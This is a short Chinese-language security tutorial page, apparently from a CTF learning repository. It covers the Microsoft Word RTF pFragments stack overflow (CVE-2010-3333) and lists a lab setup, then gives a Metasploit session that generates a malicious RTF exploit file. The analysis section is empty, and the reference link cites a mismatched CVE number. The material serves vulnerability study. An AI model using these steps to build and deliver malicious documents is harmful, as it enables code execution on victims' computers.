mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-25 11:41:16 +07:00
50 lines
1.9 KiB
Markdown
50 lines
1.9 KiB
Markdown
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
|
||
|
||
- [漏洞描述](#漏洞描述)
|
||
- [漏洞复现](#漏洞复现)
|
||
- [漏洞分析](#漏洞分析)
|
||
- [参考资料](#参考资料)
|
||
|
||
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
|
||
|
||
## 漏洞描述
|
||
|
||
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
|
||
|
||
## 漏洞复现
|
||
|
||
| |推荐使用的环境 | 备注 |
|
||
| --- | --- | --- |
|
||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
||
| 反汇编器 | IDA Pro | 版本号:7.0 |
|
||
| 漏洞软件 | MS Office | 版本号:2003 SP3 |
|
||
|
||
我们利用 Metasploit 来生成拒绝服务攻击样本:
|
||
|
||
```text
|
||
msf > search cve-2010-3333
|
||
Name Disclosure Date Rank Description
|
||
---- --------------- ---- -----------
|
||
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
|
||
|
||
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
|
||
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show info
|
||
|
||
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set target 6
|
||
target => 6
|
||
|
||
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set filename cve20103333.rtf
|
||
filename => cve20103333.rtf
|
||
|
||
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
|
||
[*] Creating 'cve20103333.rtf' file ...
|
||
[+] cve20103333.rtf stored at /home/firmy/.msf4/local/cve20103333.rtf
|
||
```
|
||
|
||
## 漏洞分析
|
||
|
||
## 参考资料
|
||
|
||
- <https://www.cvedetails.com/cve/CVE-2010-2333>
|